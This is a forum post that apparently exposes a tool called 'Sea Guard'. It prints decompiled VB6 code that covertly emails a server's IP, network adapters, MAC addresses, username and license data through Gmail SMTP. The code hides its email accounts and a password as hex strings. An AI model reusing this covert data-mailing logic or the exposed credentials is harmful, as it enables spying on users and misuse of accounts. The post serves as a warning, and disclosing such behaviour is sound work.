Now any Programmer (vb.net)
can know now what is Sea Guard ..
this hacked by me ,,
he send every thing about ur server (accounts ,etc)
from Sea Guard
what is that shit :confused:
can know now what is Sea Guard ..
this hacked by me ,,
PHP Code:
Private sub Proc_31_0_5FB980
loc_005FB9A5: var_10 = &H402808
loc_005FBA5B: Proc_01460000(fs:[00h], edx, ecx)
loc_005FBA63: xchg esp, eax
loc_005FBA64: loop 5FBAA9h
loc_005FBA66: var_74AF7FBB = var_74AF7FBB + cl
loc_005FBA71: call edi(00000001h, edi, esi, ebx)
loc_005FBA81: call msvbvm60.dll.__vbaVarSetVar("", "")
loc_005FBA8D: call edi("", "CDO.Configuration", ebx)
loc_005FBA97: call msvbvm60.dll.__vbaVarSetVar("", "")
loc_005FBAA7: call msvbvm60.dll.__vbaVarLateMemCallLd("", "", "Fields", ebx)
loc_005FBAB5: call msvbvm60.dll.__vbaVarSetVar("", msvbvm60.dll.__vbaVarLateMemCallLd("", "", "Fields", ebx))
loc_005FBABF: var_70 = "687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F63646F2F636F6E66696775726174696F6E2F"
loc_005FBAC9: Proc_005947B0(var_70, edx, ecx)
loc_005FBACE: var_78 = Proc_005947B0(var_70, edx, ecx)
loc_005FBAD6: var_80 = 8
loc_005FBADF: var_6C = Proc_005947B0(var_70, edx, ecx)
loc_005FBAEE: var_168 = "sendusing"
loc_005FBAF8: var_170 = 8
loc_005FBB03: var_188 = 2
loc_005FBB09: var_190 = 2
loc_005FBB24: var_80 = var_6C & 2
loc_005FBB74: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBB88: var_168 = "smtpserver"
loc_005FBB92: var_170 = 8
loc_005FBBA0: Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", "")
If Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", "") > var_4011AC Then GoTo loc_005FBB34
loc_005FBBAA: Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBBAF: var_88 = Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBBB5: var_90 = 8
loc_005FBBCA: var_80 = var_6C & Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBC1A: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBC42: var_168 = "smtpserverport"
loc_005FBC4C: var_170 = 8
loc_005FBC52: var_188 = &H1D1
loc_005FBC5C: var_190 = 2
loc_005FBC75: var_80 = var_6C & &H1D1
loc_005FBCC5: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBCD3: var_168 = "smtpauthenticate"
loc_005FBCDD: var_170 = 8
loc_005FBCE3: var_188 = 1
loc_005FBCED: var_190 = 2
loc_005FBD06: var_80 = var_6C & 1
loc_005FBD56: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBD64: var_168 = "sendusername"
loc_005FBD6E: var_170 = 8
loc_005FBD7C: var_70 = "6A6D65726C696E2E69732E67617940676D61696C2E636F6D0D0A"
loc_005FBD86: Proc_005947B0(var_70, var_70, ecx)
loc_005FBD8B: var_88 = Proc_005947B0(var_70, var_70, ecx)
loc_005FBD91: var_90 = 8
loc_005FBDA6: var_80 = var_6C & Proc_005947B0(var_70, var_70, ecx)
loc_005FBDF6: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBE1E: var_168 = "sendpassword"
loc_005FBE28: var_170 = 8
loc_005FBE36: Proc_01460000(var_80, "646562696C343536", "")
If Not Asm.pe_flag Then GoTo loc_005FBDCA
loc_005FBE3D: ebp = esp - 1
loc_005FBE40: Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx)
loc_005FBE4B: var_90 = 8
loc_005FBE60: var_80 = var_6C & Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx)
loc_005FBEB0: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBEBC: Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx), "")
loc_005FBEC1: byte ptr var_FFFF8F6B = byte ptr var_FFFF8F6B And FFFFFFFFh
loc_005FBED8: var_168 = "smtpusessl"
loc_005FBEE2: var_170 = 8
loc_005FBEF2: var_190 = 2
loc_005FBF0B: var_80 = var_6C & 1
loc_005FBF5B: Proc_01460000(var_184, 1, "")
loc_005FBF6A: [eax] = [eax] + ch
If ecx = 0 Then GoTo loc_005FBFB2
loc_005FBF6F: var_AD3BAB = var_AD3BAB + cl
loc_005FBF75: adc eax, 0040111Ch
loc_005FBF7B: eax]+c.""
loc_005FBF8C: var_70 = "6A6B6F77616C393840676D61696C2E636F6D"
loc_005FBF96: Proc_005947B0(var_70, edx, ecx)
loc_005FBF9B: var_78 = Proc_005947B0(var_70, edx, ecx)
loc_005FBF9E: var_80 = 8
loc_005FBFC0: call msvbvm60.dll.__vbaVarLateMemSt("", "To", var_70, "item", 00000001h)
loc_005FBFDC: var_70 = "6A6D65726C696E2E69732E67617940676D61696C2E636F6D0D0A"
loc_005FBFE6: Proc_005947B0(var_70, var_70, ecx)
loc_005FBFEB: var_78 = Proc_005947B0(var_70, var_70, ecx)
loc_005FBFEE: var_80 = 8
loc_005FC010: call msvbvm60.dll.__vbaVarLateMemSt("", "From", var_70)
loc_005FC034: var_78 = "VRun" & "rupi"
loc_005FC037: var_80 = 8
loc_005FC059: call msvbvm60.dll.__vbaVarLateMemSt("", "Subject")
loc_005FC06C: var_70 = "677561726469616E"
loc_005FC076: Proc_005947B0(var_70, var_70, ecx)
loc_005FC07B: var_78 = Proc_005947B0(var_70, var_70, ecx)
loc_005FC07E: var_80 = 8
loc_005FC0A0: call msvbvm60.dll.__vbaVarLateMemSt("", "sender", var_70)
loc_005FC0B4: var_188 = "IP"
loc_005FC0C4: var_168 = 1
loc_005FC0CE: var_170 = 2
loc_005FC0DC: Proc_005FC510("", var_80, var_80)
loc_005FC0E6: var_198 = "13#1"
loc_005FC0EC: var_1A0 = 8
loc_005FC0F2: var_1A8 = "Adapters and mac adres"
loc_005FC0FC: var_1B0 = 8
loc_005FC102: var_1B8 = "13#1"
loc_005FC108: var_1C0 = 8
loc_005FC10E: Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx)
loc_005FC113: var_D8 = Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx)
loc_005FC119: var_E0 = 8
loc_005FC11F: var_1C8 = "13#1"
loc_005FC125: var_1D0 = 8
loc_005FC12B: var_1D8 = "UserName:"
loc_005FC135: var_1E0 = 8
loc_005FC13B: Proc_005FCA70(Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx), edx, ecx)
loc_005FC140: var_118 = Proc_005FCA70(Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx), edx, ecx)
loc_005FC146: var_120 = 8
loc_005FC14C: var_1E8 = "13#1"
loc_005FC152: var_1F0 = 8
loc_005FC158: var_1F8 = "LICENSE:"
loc_005FC162: var_200 = 8
loc_005FC168: var_208 = "rupi"
loc_005FC172: var_210 = 8
loc_005FC1B4: call msvbvm60.dll.__vbaVarIndexLoad(var_90, var_80, 00000001h, 8, var_80)
loc_005FC1C5: var_A0 = %StkVar3 & "rupi"
loc_005FC1D6: var_B0 = var_A0 & "rupi"
loc_005FC1E7: var_C0 = var_B0 & "rupi"
loc_005FC26F: var_160 = var_C0 & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi"
loc_005FC295: call msvbvm60.dll.__vbaVarLateMemSt("", "TextBody")
loc_005FC330: call msvbvm60.dll.__vbaVarLateMemStAd("", "Configuration", 00000000h, 0000000Fh, var_80, var_90, var_A0, var_B0, var_C0)
loc_005FC344: call msvbvm60.dll.__vbaObjVar("", "Send", 00000000h)
loc_005FC34B: msvbvm60.dll.__vbaObjVar("", "Send", 00000000h).%StkVar2
loc_005FC360: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC368: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC370: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC372: call Exit Sub
loc_005FC37D: GoTo loc_005FC4B8
loc_005FC387: var_A8 = 80020004h
loc_005FC398: var_98 = 80020004h
loc_005FC39E: var_A0 = 10
loc_005FC3A4: var_88 = 80020004h
loc_005FC3AA: var_90 = 10
loc_005FC3B0: var_168 = "Cannot Connect Sea Guard, check your internet connection"
loc_005FC3BA: var_170 = 8
loc_005FC3EE: MsgBox "Cannot Connect Sea Guard, check your internet connection", 0
loc_005FC418: End
loc_005FC41E: call Exit Sub(10, 005FC4D3h)
loc_005FC429: GoTo loc_005FC4B8
loc_005FC4B7: Exit Sub
loc_005FC4B8:
End Sub
he send every thing about ur server (accounts ,etc)
from Sea Guard
what is that shit :confused: